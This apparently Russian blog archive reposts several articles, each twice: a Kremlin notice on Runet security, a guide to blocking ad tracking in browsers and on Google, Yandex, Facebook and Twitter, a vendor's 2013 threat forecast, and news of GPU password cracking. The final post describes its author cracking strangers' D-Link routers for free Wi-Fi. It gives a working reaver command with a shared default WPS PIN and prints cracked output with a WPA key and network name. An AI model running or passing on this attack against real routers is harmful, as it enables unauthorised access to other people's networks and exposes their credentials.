среда, 1 октября 2014 г.

Путин проведёт совещание Совбеза, посвящённое безопасности Рунета


Российский президент Владимир Путин в среду, 1 октября, обсудит с членами Совета Безопасности РФ вопросы обеспечения информационной безопасности Рунета.
Об этом информирует пресс-служба Кремля. Одной из тем заседания станет вопрос дальнейшей устойчивой работы российского сегмента сети интернет. Участники совещания обсудят, как исключить возможность ограничения доступа российских компаний и граждан.
Заседание пройдёт в рамках принятой Стратегии национальной безопасности и Доктрины информационной безопасности, которые особенно актуальны в условиях быстрых темпов развития интернет-коммуникации в мировом сообществе, говорится в сообщении пресс-службы.

о1.10.2014, 00:51

Материалы по теме: 




Российский президент Владимир Путин в среду, 1 октября, обсудит с членами Совета Безопасности РФ вопросы обеспечения информационной безопасности Рунета.
Об этом информирует пресс-служба Кремля. Одной из тем заседания станет вопрос дальнейшей устойчивой работы российского сегмента сети интернет. Участники совещания обсудят, как исключить возможность ограничения доступа российских компаний и граждан.
Заседание пройдёт в рамках принятой Стратегии национальной безопасности и Доктрины информационной безопасности, которые особенно актуальны в условиях быстрых темпов развития интернет-коммуникации в мировом сообществе, говорится в сообщении пресс-службы.

о1.10.2014, 00:51

Материалы по теме: 



вторник, 3 июня 2014 г.

Вне "колпака". Уходим от слежки на компьютере


Браузеры

С начала 2011 года разработчики браузеров начали внедрять в них функцию отказа от слежки — Do Not Track (DNT). Она уведомляет сайты о том, что пользователь не хочет, чтобы рекламщики следили за его перемещениями по Сети и собирали о нем конфиденциальные данные при помощи cookie-файлов. Как правило, по умолчанию DNT выключена. Чтобы ее активировать, выполните следующие шаги:

Firefox: зайдите в "Настройки" → выберите вкладку "Приватность" и поставьте переключатель напротив пункта "Сообщать сайтам, что я не хочу, чтобы меня отслеживали"



Chrome: откройте "Настройки" → на открывшемся экране перейдите по ссылке "Показать дополнительные настройки" (внизу) → в разделе "Личные данные" поставьте галку рядом с "Отправлять с исходящим трафиком запрос "Не отслеживать". Там же рекомендует снять галки с "Предсказывать сетевые действия для ускорения загрузки страниц" и "Автоматически отправлять в Google статистику использования и отчеты о сбоях".



Internet Explorer: "Настройки" → "Безопасность" → "Отправлять запросы Do Not Track ('Не отслеживать')" → нажмите на кнопку "Включить"



Safari: "Настройки" → перейдите на вкладку "Конфиденциальность" → и поставьте галку напротив "Запретить веб-сайтам отслеживать меня".



Opera: "Настройки" → раздел "Конфиденциальность и безопасность" → отметьте "Отправлять запрос 'Не отслеживать' с данными". По желанию, галки рядом с "Использовать службу предсказания для автодополнения вводимого поискового запроса или ссылки в адресной строке" и "Предсказывать сетевые действия для оптимизации загрузки страницы" можно снять

Включение этого параметра, однако, не означает, что сайты тут же перестанут надоедать вам "нацеливаемой" рекламой. Пока DNT носит рекомендательный характер. Она лишь информирует сайты о желании пользователей прекратить за ними слежку, но не дает никаких гарантий, что рекламодатели эту просьбу исполнят.

Кроме того, пока нет никаких договоренностей насчет того, как именно должна работать DNT. С одной стороны, все больше пользователей не хочет, чтобы за ними вели слежку. По итогам опроса, проведенного агентством Forrester Research в марте 2013 года, функция DNT была включена у 18% интернетчиков. С другой, против этой системы выступают рекламщики, настаивая, что поведенческая реклама — это неотъемлемая часть бесплатных веб-сервисов. Ожидается, что в 2014 году Консорциум Всемирной паутины (W3C) внесет ясность в этот вопрос, приняв механизм DNT как стандарт и сделав его исполнение обязательным.



Расширения

Отключение DNT — еще не панацея. Мы также советуем установить расширение для браузера, которое будет блокировать рекламные cookie-файлы. Одним из лучших плагинов такого рода (для Firefox и Chrome) является Ghostery, который выявляет поведенческие маяки, аналитические "жучки" и рекламные "куки" Facebook, Google Adsense, "Яндекс.Метрики", DoubleClick и сотен других рекламных сетей.



Так ведет себя Ghostery при заходе на Twitter
Ghostery очень удобен в обращении и, что немаловажно, переведен на русский язык. После установки дополнения на панели навигации браузера появится счетчик, оповещающий о количестве найденных на сайте "жучков". К примеру, зайдя в Twitter, вы увидите один "жучок" Google Analytics, на Apple — маяк Omniture (Adobe Analytics), а в разделе новостей "Яндекса" — "жучки" "Яндекс.Директа" и "Яндекс.Метрики". Чтобы их заблокировать, надо нажать на иконку с изображением привидения и переместить переключатели вправо.



Google
В начале 2012 года Google приняла новую политику конфиденциальности. Смысл документа, вступившего в силу в марте, сводился к тому, что крупнейший интернет-поисковик обладает правом объединять данные одного и того же человека в разных сервисах компании и использовать эту информацию для показа рекламы. К примеру, Google сможет запомнить, какой запрос пользователь ввел в поисковую систему, и показать объявление, которое может его заинтересовать. Информация собирается по всем 60 принадлежащим компании службам, включая почту Gmail, видеохостинг YouTube, карты Google Maps и другие. При этом пользователи не могли отказаться от этих изменений. Сама компания заявляла, что новые правила позволят ей повысить точность поисковых результатов, а также улучшить функциональность других сервисов.
Несмотря на "умные" очки Glass и другие экспериментальные проекты, браузер Chrome и даже платформу Android, именно интернет-реклама остается важнейшим источником доходов Google. Из контекстных объявлений, учитывающих ваши интересы, компания извлекает огромную прибыль, и ограничить их показ оказывается не так-то легко.

Для начала вам нужно узнать, какие данные имеются в распоряжении сервисов Google. Сделать это можно в "Личном кабинете": здесь доступна информация о привязанных к аккаунту Android-устройствах, загруженных на YouTube видео, файлах в "Документах", задачах, контактах, событиях в "Календаре", письмах Gmail и пр.

"Личный кабинет" Google. Если вы не пользуетесь некоторыми службами, удаляйте из них свои данные (к примеру, веб-альбомы Picasa) и максимально ограничивайте к ним доступ посторонним.
Если скачали приложение для смартфона и разрешили ему доступ к списку задач, аккаунту Google+ или другой информации — отвяжите его (например, "Аккаунт" → "Связанные приложения и сайты", YouTube → "Подключенные аккаунты", Google+ → "Управление приложениями"). Также запретите запись истории местоположений ("История местоположений" → "Настройки" → на новой странице выставьте флажок рядом с Disable и нажмите кнопку Save; после не забудьте очистить историю ваших локаций, перейдя по ссылке History management).



Очистка истории просмотров в YouTube
Внимательно пройдитесь по всем другим настройкам, т.к. самые важные из них погребено довольно глубоко. В разделе YouTube мы рекомендуем войти в "Управление историей", нажать на "Очистить историю просмотров", а после — "Приостановить запись истории просмотров". То же сделайте в "Управлении историей поиска": очистите историю и приостановите запись. При желании, ограничьте доступ к вашим подпискам и понравившимся видео (раздел "Настройки конфиденциальности").



Настройки профиля Google+
Настройки Google+ зависят от ваших предпочтений. Здесь можно, например, запретить показывать ваш профиль в результатах поиска Google, запретить раскрывать местоположение, запретить добавлять EXIF-данные к загруженным снимкам и другое.



Настройки рекламы Google — Google Ads
Зайдите в настройки Google Ads и посмотрите, как вас видят рекламщики: здесь указаны пол, возрастная категория, знания языков и интересы. Если вы не хотите, чтобы эта информация попадала в агентства, в разделе Opt-out settings нажимайте на ссылки opt out ("Отказ от участия") и подтверждайте отказ. Вы по-прежнему будете видеть рекламу, но она не будет зависеть от ваших интересов и посещений партнерских сайтов. Важно: данные о вашем отказе хранятся в cookie-файлах, поэтому если вы удалите "куки" или смените браузер — отказываться придется снова.



Настройки поисковой истории Google
По умолчанию Google хранит любую информацию, которую вы когда-либо искали. Если вы этого не желаете, перейдите в настройки Google Search и нажмите на кнопку Turn off, после чего удалите всю ранее накопленную историю (проставьте галки и нажмите на кнопку Remove items).


"Яндекс"

C крупнейший российским поисковиком все немного проще. В самом низу настроек результатов поиска (блок "Персональный поиск") снимите все галки и остановите запись истории

Зайдите в "Мои находки", остановите запись истории поисковых запросов, нажмите кнопку "Очистить историю", а затем отключите находки в поисковых подсказках

Поисковые подсказки (они появляются в выпадающем меню при вводе запроса в "Яндекс") можно оставить, предварительно запретив включать в них собственные запросы и очистив историю. Кроме того, лучше исключить из подсказок сайты, которые вы чаще всего посещаете. Выставив настройки, не забудьте нажать на кнопку "Сохранить" внизу. Также, если вам мешает большой баннер на главной странице поисковика, отключите его здесь

Самая важная настройка, касаемая рекламной системы "Яндекс.Директ", как обычно, расположена в самом низу. "На партнерских площадках Яндекс показывает рекламу с учетом индивидуальных интересов пользователей, которые определяются по их поведению на Яндексе и на сайтах-участниках Рекламной сети Яндекса", — говорит компания.

Если вы не желаете, чтобы "Яндекс" сохранял в вашем браузере cookie-файлы, а его партнеры учитывали ваши интересы при показе рекламы, выставьте галку рядом с пунктом "Не учитывать круг ваших интересов при показе рекламы" и нажмите на кнопку "Сохранить"


Facebook

"Facebook не предоставляет приложениям третьих сторон или рекламным сетям права использовать ваше имя или фотографии в рекламных объявлениях. Если мы разрешим это в будущем, то вы сможете выбирать настройки, которые будут регулировать использование вашей информации", — говорится на сайте крупнейшей социальной сети. Тем не менее, лучше подстраховаться на случай, если компания начнет продавать ваши имена и фотографии.

Откройте "Настройки" → "Реклама", нажмите на ссылку "Редактировать" (справа от блока "Сайты третьего лица"), выставьте значение "Никто" и нажмите "Сохранить изменения"

Если вы не хотите, чтобы вам рекламировали то, что "лайкают" вы и ваши друзья, в блоке "Реклама и друзья" выставьте значение "Никто"

И самое важное (как всегда, написано самым мелким шрифтом): запретите Facebook показывать рекламу, связанную с вашими действиями в социальной сети и за ее пределами, а также в приложениях от сторонних разработчиков. Перейдите по этой ссылке и нажмите на кнопку "Отказаться".


Twitter

Отключить "целевую" рекламу в Twitter очень легко. Заходите в "Настройки" → раздел "Безопасность и конфиденциальность", прокручивайте страницу до конца и снимайте галку со следующих пунктов: "Адаптировать Твиттер исходя из недавно посещенных веб-страниц" и "Реклама подбирается индивидуально и основана на информации от рекламных партнеров". Затем нажмите на кнопку "Сохранить изменения".

 

"ВКонтакте"

Отказаться от таргетированной рекламы в самой популярной в Рунете социальной сети нельзя. Объявления показываются исходя из той информации, которую вы указали в своем профиле: города, возраста, интересов, вуза, групп и т.п. Непонравившуюся рекламу можно только скрыть, наведя на нее мышкой и нажав на крестик — но тогда на ее месте появится другая. В случае, если вы не хотите видеть объявления вообще, установите расширение-блокировщик для браузера, такое как AdBlock Plus. Можно убрать город, поставить возраст более 90 лет, и указать местом проживания неизвестную страну ,в этом случае вы скорее всего не будете получать релевантную таргетированную рекламу и без эдблок.

Вне "колпака". Уходим от слежки на компьютере

источник


              

Опубликовано 02.06.2014 в 11:06

http://nayavu.mirtesen.ru/


Браузеры

С начала 2011 года разработчики браузеров начали внедрять в них функцию отказа от слежки — Do Not Track (DNT). Она уведомляет сайты о том, что пользователь не хочет, чтобы рекламщики следили за его перемещениями по Сети и собирали о нем конфиденциальные данные при помощи cookie-файлов. Как правило, по умолчанию DNT выключена. Чтобы ее активировать, выполните следующие шаги:

Firefox: зайдите в "Настройки" → выберите вкладку "Приватность" и поставьте переключатель напротив пункта "Сообщать сайтам, что я не хочу, чтобы меня отслеживали"



Chrome: откройте "Настройки" → на открывшемся экране перейдите по ссылке "Показать дополнительные настройки" (внизу) → в разделе "Личные данные" поставьте галку рядом с "Отправлять с исходящим трафиком запрос "Не отслеживать". Там же рекомендует снять галки с "Предсказывать сетевые действия для ускорения загрузки страниц" и "Автоматически отправлять в Google статистику использования и отчеты о сбоях".



Internet Explorer: "Настройки" → "Безопасность" → "Отправлять запросы Do Not Track ('Не отслеживать')" → нажмите на кнопку "Включить"



Safari: "Настройки" → перейдите на вкладку "Конфиденциальность" → и поставьте галку напротив "Запретить веб-сайтам отслеживать меня".



Opera: "Настройки" → раздел "Конфиденциальность и безопасность" → отметьте "Отправлять запрос 'Не отслеживать' с данными". По желанию, галки рядом с "Использовать службу предсказания для автодополнения вводимого поискового запроса или ссылки в адресной строке" и "Предсказывать сетевые действия для оптимизации загрузки страницы" можно снять

Включение этого параметра, однако, не означает, что сайты тут же перестанут надоедать вам "нацеливаемой" рекламой. Пока DNT носит рекомендательный характер. Она лишь информирует сайты о желании пользователей прекратить за ними слежку, но не дает никаких гарантий, что рекламодатели эту просьбу исполнят.

Кроме того, пока нет никаких договоренностей насчет того, как именно должна работать DNT. С одной стороны, все больше пользователей не хочет, чтобы за ними вели слежку. По итогам опроса, проведенного агентством Forrester Research в марте 2013 года, функция DNT была включена у 18% интернетчиков. С другой, против этой системы выступают рекламщики, настаивая, что поведенческая реклама — это неотъемлемая часть бесплатных веб-сервисов. Ожидается, что в 2014 году Консорциум Всемирной паутины (W3C) внесет ясность в этот вопрос, приняв механизм DNT как стандарт и сделав его исполнение обязательным.



Расширения

Отключение DNT — еще не панацея. Мы также советуем установить расширение для браузера, которое будет блокировать рекламные cookie-файлы. Одним из лучших плагинов такого рода (для Firefox и Chrome) является Ghostery, который выявляет поведенческие маяки, аналитические "жучки" и рекламные "куки" Facebook, Google Adsense, "Яндекс.Метрики", DoubleClick и сотен других рекламных сетей.



Так ведет себя Ghostery при заходе на Twitter
Ghostery очень удобен в обращении и, что немаловажно, переведен на русский язык. После установки дополнения на панели навигации браузера появится счетчик, оповещающий о количестве найденных на сайте "жучков". К примеру, зайдя в Twitter, вы увидите один "жучок" Google Analytics, на Apple — маяк Omniture (Adobe Analytics), а в разделе новостей "Яндекса" — "жучки" "Яндекс.Директа" и "Яндекс.Метрики". Чтобы их заблокировать, надо нажать на иконку с изображением привидения и переместить переключатели вправо.



Google
В начале 2012 года Google приняла новую политику конфиденциальности. Смысл документа, вступившего в силу в марте, сводился к тому, что крупнейший интернет-поисковик обладает правом объединять данные одного и того же человека в разных сервисах компании и использовать эту информацию для показа рекламы. К примеру, Google сможет запомнить, какой запрос пользователь ввел в поисковую систему, и показать объявление, которое может его заинтересовать. Информация собирается по всем 60 принадлежащим компании службам, включая почту Gmail, видеохостинг YouTube, карты Google Maps и другие. При этом пользователи не могли отказаться от этих изменений. Сама компания заявляла, что новые правила позволят ей повысить точность поисковых результатов, а также улучшить функциональность других сервисов.
Несмотря на "умные" очки Glass и другие экспериментальные проекты, браузер Chrome и даже платформу Android, именно интернет-реклама остается важнейшим источником доходов Google. Из контекстных объявлений, учитывающих ваши интересы, компания извлекает огромную прибыль, и ограничить их показ оказывается не так-то легко.

Для начала вам нужно узнать, какие данные имеются в распоряжении сервисов Google. Сделать это можно в "Личном кабинете": здесь доступна информация о привязанных к аккаунту Android-устройствах, загруженных на YouTube видео, файлах в "Документах", задачах, контактах, событиях в "Календаре", письмах Gmail и пр.

"Личный кабинет" Google. Если вы не пользуетесь некоторыми службами, удаляйте из них свои данные (к примеру, веб-альбомы Picasa) и максимально ограничивайте к ним доступ посторонним.
Если скачали приложение для смартфона и разрешили ему доступ к списку задач, аккаунту Google+ или другой информации — отвяжите его (например, "Аккаунт" → "Связанные приложения и сайты", YouTube → "Подключенные аккаунты", Google+ → "Управление приложениями"). Также запретите запись истории местоположений ("История местоположений" → "Настройки" → на новой странице выставьте флажок рядом с Disable и нажмите кнопку Save; после не забудьте очистить историю ваших локаций, перейдя по ссылке History management).



Очистка истории просмотров в YouTube
Внимательно пройдитесь по всем другим настройкам, т.к. самые важные из них погребено довольно глубоко. В разделе YouTube мы рекомендуем войти в "Управление историей", нажать на "Очистить историю просмотров", а после — "Приостановить запись истории просмотров". То же сделайте в "Управлении историей поиска": очистите историю и приостановите запись. При желании, ограничьте доступ к вашим подпискам и понравившимся видео (раздел "Настройки конфиденциальности").



Настройки профиля Google+
Настройки Google+ зависят от ваших предпочтений. Здесь можно, например, запретить показывать ваш профиль в результатах поиска Google, запретить раскрывать местоположение, запретить добавлять EXIF-данные к загруженным снимкам и другое.



Настройки рекламы Google — Google Ads
Зайдите в настройки Google Ads и посмотрите, как вас видят рекламщики: здесь указаны пол, возрастная категория, знания языков и интересы. Если вы не хотите, чтобы эта информация попадала в агентства, в разделе Opt-out settings нажимайте на ссылки opt out ("Отказ от участия") и подтверждайте отказ. Вы по-прежнему будете видеть рекламу, но она не будет зависеть от ваших интересов и посещений партнерских сайтов. Важно: данные о вашем отказе хранятся в cookie-файлах, поэтому если вы удалите "куки" или смените браузер — отказываться придется снова.



Настройки поисковой истории Google
По умолчанию Google хранит любую информацию, которую вы когда-либо искали. Если вы этого не желаете, перейдите в настройки Google Search и нажмите на кнопку Turn off, после чего удалите всю ранее накопленную историю (проставьте галки и нажмите на кнопку Remove items).


"Яндекс"

C крупнейший российским поисковиком все немного проще. В самом низу настроек результатов поиска (блок "Персональный поиск") снимите все галки и остановите запись истории

Зайдите в "Мои находки", остановите запись истории поисковых запросов, нажмите кнопку "Очистить историю", а затем отключите находки в поисковых подсказках

Поисковые подсказки (они появляются в выпадающем меню при вводе запроса в "Яндекс") можно оставить, предварительно запретив включать в них собственные запросы и очистив историю. Кроме того, лучше исключить из подсказок сайты, которые вы чаще всего посещаете. Выставив настройки, не забудьте нажать на кнопку "Сохранить" внизу. Также, если вам мешает большой баннер на главной странице поисковика, отключите его здесь

Самая важная настройка, касаемая рекламной системы "Яндекс.Директ", как обычно, расположена в самом низу. "На партнерских площадках Яндекс показывает рекламу с учетом индивидуальных интересов пользователей, которые определяются по их поведению на Яндексе и на сайтах-участниках Рекламной сети Яндекса", — говорит компания.

Если вы не желаете, чтобы "Яндекс" сохранял в вашем браузере cookie-файлы, а его партнеры учитывали ваши интересы при показе рекламы, выставьте галку рядом с пунктом "Не учитывать круг ваших интересов при показе рекламы" и нажмите на кнопку "Сохранить"


Facebook

"Facebook не предоставляет приложениям третьих сторон или рекламным сетям права использовать ваше имя или фотографии в рекламных объявлениях. Если мы разрешим это в будущем, то вы сможете выбирать настройки, которые будут регулировать использование вашей информации", — говорится на сайте крупнейшей социальной сети. Тем не менее, лучше подстраховаться на случай, если компания начнет продавать ваши имена и фотографии.

Откройте "Настройки" → "Реклама", нажмите на ссылку "Редактировать" (справа от блока "Сайты третьего лица"), выставьте значение "Никто" и нажмите "Сохранить изменения"

Если вы не хотите, чтобы вам рекламировали то, что "лайкают" вы и ваши друзья, в блоке "Реклама и друзья" выставьте значение "Никто"

И самое важное (как всегда, написано самым мелким шрифтом): запретите Facebook показывать рекламу, связанную с вашими действиями в социальной сети и за ее пределами, а также в приложениях от сторонних разработчиков. Перейдите по этой ссылке и нажмите на кнопку "Отказаться".


Twitter

Отключить "целевую" рекламу в Twitter очень легко. Заходите в "Настройки" → раздел "Безопасность и конфиденциальность", прокручивайте страницу до конца и снимайте галку со следующих пунктов: "Адаптировать Твиттер исходя из недавно посещенных веб-страниц" и "Реклама подбирается индивидуально и основана на информации от рекламных партнеров". Затем нажмите на кнопку "Сохранить изменения".

 

"ВКонтакте"

Отказаться от таргетированной рекламы в самой популярной в Рунете социальной сети нельзя. Объявления показываются исходя из той информации, которую вы указали в своем профиле: города, возраста, интересов, вуза, групп и т.п. Непонравившуюся рекламу можно только скрыть, наведя на нее мышкой и нажав на крестик — но тогда на ее месте появится другая. В случае, если вы не хотите видеть объявления вообще, установите расширение-блокировщик для браузера, такое как AdBlock Plus. Можно убрать город, поставить возраст более 90 лет, и указать местом проживания неизвестную страну ,в этом случае вы скорее всего не будете получать релевантную таргетированную рекламу и без эдблок.

Вне "колпака". Уходим от слежки на компьютере

источник


              

Опубликовано 02.06.2014 в 11:06

http://nayavu.mirtesen.ru/

суббота, 26 января 2013 г.

Эксперты STONESOFT назвали главные угрозы безопасности в 2013 году


Эксперты корпорации STONESOFT — разработчика инновационных решений в сфере обеспечения сетевой безопасности и непрерывности бизнеса — опубликовали ТОП-6 угроз безопасности в 2013 году.
 
По мнению аналитиков в наступившем году мировое сообщество столкнется с еще более изощренными кибер-атаками, кибер-шпионажем и хакерством во имя политических и/или религиозных целей.
 
«Мы живем в цифровом мире и вопросы кибер-безопасности являются сегодня для мирового сообщества все более и более важными. С каждым годом, с каждым часом,  значение понятия «информационная безопасность» растет, а это значит, что пришло время думать о международных нормах, правилах и законодательстве в данной сфере», - говорит Jarno Limnell, директор по кибер-безопасности корпорации STONESOFT.
 
«Государства активно инвестируют в свои кибер-возможности. Причем, речь идет как о защите, так и о нападении. Количество кибер-войн в мире будет увеличиваться, что может привести к серьезным последствиям и непредсказуемым побочным эффектам. Последствия какой-то одной атаки могут быстро распространиться по всему миру, даже по ошибке. Несметное количество игроков по всему миру инвестируют огромные средства для изменения существующей кибир-реальности», - подчеркнул эксперт.
 
ТОП-6 главных угроз безопасности в 2013 году
 
1. В 2013 году мировое сообщество столкнется с новыми целенаправленными хакерскими атаками. Разработка новых изощренных вредоносных программ, спонсируемая на государственном уровне, может радикальным образом повлиять на скорость распространения угроз и на мировой ландшафт безопасности в целом. Кибер-угрозы станут более непредсказуемыми, чем раньше.
 
2. Продолжит увеличиваться уровень государственного кибер-шпионажа.. В 2012 мы столкнулись с ботнетамии и вредоносным ПО, которые незаметно отсылают все содержание жесткого диска пользователя злоумышленнику. С таким мы столкнемся и в 2013 году. Защита критических инфраструктур на национальном уровне станет ключевым аспектом кибер безопасности государств.
 
3. Существенным образом увеличиться хакерство во имя политических и/или религиозных целей и станет более значимым и страшным, в частности более агрессивным, что значительно увеличит его эффект. В тоже время роль вненациональных игроков станет более важной, в особенности относительно экспертизы, а не просто ресурсов.
 
4. В 2013 году мир также столкнется с  новыми динамическими техниками обхода (AETs), которые будут применяться против крупных организаций и правительств различных государств. По мере того, как совершенствуются технологии защиты и улучшается общая способность противостоять кибер-атакам, хакеры будут инвестировать свои “R&D” ресурсы в разработку и развитие все более и более изощренных техник обхода для увеличения возврата своих инвестиций. Эта одна из самых серьезных угроз, так как современные технологии безопасности не способны диагностировать и противостоять AETs, таким образом, целевая система даже не знает, что подверглась нападению.
 
5. В 2012 году общество узнало о множестве уязвимостей в корпоративных приложениях, таких как Oracle, SAP и SCADA. Эти приложения содержат критически важные бизнес-данные и являются чрезвычайно ценной мишенью для злоумышленников. К сожалению, их уязвимость по-прежнему будет являться проблемой в 2013 году.
 
6. Платформа Android в 2013 году также останется излюбленной мишенью для хакеров. Поскольку она представляет привлекательную среду для вредоносных программ, хакеры будут этим пользоваться.
«Не исключено, что мы станем свидетелями того, как первый глобальный потребительский бренд  обанкротится в результате кибератаки, которая навредит ее репутации и потеряет доверие пользователей», - отмечают эксперты STONESOFT.
 
«По мере того, как увеличиваются кибер-возможности различных игроков на мировом рынке, мы увидим все более и более сложные целенаправленные атаки, против которых традиционные системы безопасности не способных обеспечить эффективную защиту», - говорит Ville Hämäläinen, Директор R&D корпорации STONESOFT. 
 
«Чтобы защитить себя от современных кибер-угроз, организациям необходимо сделать качественный скачок от традиционной реактивной защиты от известных угроз к превентивной и проактивной защите, готовности к противостоянию с неизвестным для повышения своей операциональной стабильности и просто выживания в современном кибер-пространстве», - добавляет Hämäläinen.

Разместил: xbox
 12NEWS

Эксперты корпорации STONESOFT — разработчика инновационных решений в сфере обеспечения сетевой безопасности и непрерывности бизнеса — опубликовали ТОП-6 угроз безопасности в 2013 году.
 
По мнению аналитиков в наступившем году мировое сообщество столкнется с еще более изощренными кибер-атаками, кибер-шпионажем и хакерством во имя политических и/или религиозных целей.
 
«Мы живем в цифровом мире и вопросы кибер-безопасности являются сегодня для мирового сообщества все более и более важными. С каждым годом, с каждым часом,  значение понятия «информационная безопасность» растет, а это значит, что пришло время думать о международных нормах, правилах и законодательстве в данной сфере», - говорит Jarno Limnell, директор по кибер-безопасности корпорации STONESOFT.
 
«Государства активно инвестируют в свои кибер-возможности. Причем, речь идет как о защите, так и о нападении. Количество кибер-войн в мире будет увеличиваться, что может привести к серьезным последствиям и непредсказуемым побочным эффектам. Последствия какой-то одной атаки могут быстро распространиться по всему миру, даже по ошибке. Несметное количество игроков по всему миру инвестируют огромные средства для изменения существующей кибир-реальности», - подчеркнул эксперт.
 
ТОП-6 главных угроз безопасности в 2013 году
 
1. В 2013 году мировое сообщество столкнется с новыми целенаправленными хакерскими атаками. Разработка новых изощренных вредоносных программ, спонсируемая на государственном уровне, может радикальным образом повлиять на скорость распространения угроз и на мировой ландшафт безопасности в целом. Кибер-угрозы станут более непредсказуемыми, чем раньше.
 
2. Продолжит увеличиваться уровень государственного кибер-шпионажа.. В 2012 мы столкнулись с ботнетамии и вредоносным ПО, которые незаметно отсылают все содержание жесткого диска пользователя злоумышленнику. С таким мы столкнемся и в 2013 году. Защита критических инфраструктур на национальном уровне станет ключевым аспектом кибер безопасности государств.
 
3. Существенным образом увеличиться хакерство во имя политических и/или религиозных целей и станет более значимым и страшным, в частности более агрессивным, что значительно увеличит его эффект. В тоже время роль вненациональных игроков станет более важной, в особенности относительно экспертизы, а не просто ресурсов.
 
4. В 2013 году мир также столкнется с  новыми динамическими техниками обхода (AETs), которые будут применяться против крупных организаций и правительств различных государств. По мере того, как совершенствуются технологии защиты и улучшается общая способность противостоять кибер-атакам, хакеры будут инвестировать свои “R&D” ресурсы в разработку и развитие все более и более изощренных техник обхода для увеличения возврата своих инвестиций. Эта одна из самых серьезных угроз, так как современные технологии безопасности не способны диагностировать и противостоять AETs, таким образом, целевая система даже не знает, что подверглась нападению.
 
5. В 2012 году общество узнало о множестве уязвимостей в корпоративных приложениях, таких как Oracle, SAP и SCADA. Эти приложения содержат критически важные бизнес-данные и являются чрезвычайно ценной мишенью для злоумышленников. К сожалению, их уязвимость по-прежнему будет являться проблемой в 2013 году.
 
6. Платформа Android в 2013 году также останется излюбленной мишенью для хакеров. Поскольку она представляет привлекательную среду для вредоносных программ, хакеры будут этим пользоваться.
«Не исключено, что мы станем свидетелями того, как первый глобальный потребительский бренд  обанкротится в результате кибератаки, которая навредит ее репутации и потеряет доверие пользователей», - отмечают эксперты STONESOFT.
 
«По мере того, как увеличиваются кибер-возможности различных игроков на мировом рынке, мы увидим все более и более сложные целенаправленные атаки, против которых традиционные системы безопасности не способных обеспечить эффективную защиту», - говорит Ville Hämäläinen, Директор R&D корпорации STONESOFT. 
 
«Чтобы защитить себя от современных кибер-угроз, организациям необходимо сделать качественный скачок от традиционной реактивной защиты от известных угроз к превентивной и проактивной защите, готовности к противостоянию с неизвестным для повышения своей операциональной стабильности и просто выживания в современном кибер-пространстве», - добавляет Hämäläinen.

Разместил: xbox
 12NEWS

четверг, 24 января 2013 г.

25 видеокарт ATI Radeon взламывают пароль от Windows меньше чем за 6 часов




Издание ArsTechnica сообщает, что эксперт по безопасности Джереми Госни и его компания Stricture Consulting Group нашли способ взламывать любой пароль от Windows всего за пять с половиной часов. Для этого нужно ни много ни мало 25 видеокарт, смонтированных в несколько серверов и нагруженных параллельными вычислениями. Демонстрация проводилась на конференции Passwords^12 в Осло.
Кластер генерирует около 350 миллиардов паролей в секунду и за пять с половиной часов успевает перебрать все 958 возможных вариантов восьмизначного пароля, состоящего из букв, цифр и специальных символов. Криптографический алгоритм NTLM, на взлом которого нацелена система, работает во всех версиях Windows начиная с Windows Server 2003.
Сам кластер работает на операционной системе Linux и использует платформу Virtual OpenCL. Она позволяет всему кластеру работать так, будто это один очень мощный компьютер.
Для подбора паролей применяется не простой перебор «грубой силой». Здесь используется общедоступный алгоритм ocl-Hashcat Plus, оптимизированный на использование для вычислений графических чипов. В ocl-Hashcat Plus входит 44 алгоритма, которые генерируют не просто случайные последовательности — вместо этого они перебирают специализированные словари из миллионов слов и составляют последовательности, которые могут попасться в пароле с наибольшей вероятностью.
Интересно, что сделать пароль более стойким очень просто — достаточно использовать сочетание из девяти и более символов. 13-20 символов сделают его полностью защищённым. Впрочем, мощности оборудования растут так быстро, что гарантировать что-то становится очень непросто.
 Андрей Письменный Автор: Андрей Письменный



Издание ArsTechnica сообщает, что эксперт по безопасности Джереми Госни и его компания Stricture Consulting Group нашли способ взламывать любой пароль от Windows всего за пять с половиной часов. Для этого нужно ни много ни мало 25 видеокарт, смонтированных в несколько серверов и нагруженных параллельными вычислениями. Демонстрация проводилась на конференции Passwords^12 в Осло.
Кластер генерирует около 350 миллиардов паролей в секунду и за пять с половиной часов успевает перебрать все 958 возможных вариантов восьмизначного пароля, состоящего из букв, цифр и специальных символов. Криптографический алгоритм NTLM, на взлом которого нацелена система, работает во всех версиях Windows начиная с Windows Server 2003.
Сам кластер работает на операционной системе Linux и использует платформу Virtual OpenCL. Она позволяет всему кластеру работать так, будто это один очень мощный компьютер.
Для подбора паролей применяется не простой перебор «грубой силой». Здесь используется общедоступный алгоритм ocl-Hashcat Plus, оптимизированный на использование для вычислений графических чипов. В ocl-Hashcat Plus входит 44 алгоритма, которые генерируют не просто случайные последовательности — вместо этого они перебирают специализированные словари из миллионов слов и составляют последовательности, которые могут попасться в пароле с наибольшей вероятностью.
Интересно, что сделать пароль более стойким очень просто — достаточно использовать сочетание из девяти и более символов. 13-20 символов сделают его полностью защищённым. Впрочем, мощности оборудования растут так быстро, что гарантировать что-то становится очень непросто.
 Андрей Письменный Автор: Андрей Письменный

понедельник, 22 октября 2012 г.

Взломать Wi-Fi за… 3 секунды



27 сентября 2012 в 23:48

Взломать Wi-Fi за… 3 секунды

Какой человек не любит халявы? Практически все ее просто обожают, и я не исключение. И вдохновленный статьей Взломать Wi-Fi за 10 часов, я достал из недр харда BT5, скачанный ранее, и записал его на болванку. Результат не заставил себя ждать, и первый пароль был получен на следующее утро. И понеслась...

Однако, каково же было мое удивление, когда у второй жертвы оказался тот же пин-код, что и у первой (в частности такой: 46264848). Замечу, что роутеры были одинаковые, D'Link DSL 2640NRU, пожалуй, самая распространенная модель на рынке. С версией прошивки 1.0.10.
В итоге, из 6 аппаратов (из них было 5 Д'Линков), попавшихся мне, у 4 были одинаковые пин-коды, которые, кстати, меняются после прошивки и восстанавливаются после обратного перехода на 1.0.10. В чем дело: одна партия роутеров? Одна прошивка? Не знаю, но факт остается фактом, время атаки на львиную долю роутеров можно сократить с 2-∞ часов до нескольких секунд, учитывая, что большинству людей плевать на безопасность своей сети (из-за своей лени или невежества?).

Для этого нужно всего лишь вписать конкретный пин-код в команду Reaverу:

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -p 46264848 -vv

В сухом остатке имеем:

image
image

Или так…

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '12316061989'
[+] AP SSID: 'Shat_SatyricoN'

[+] Pin cracked in 51 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3159801111'
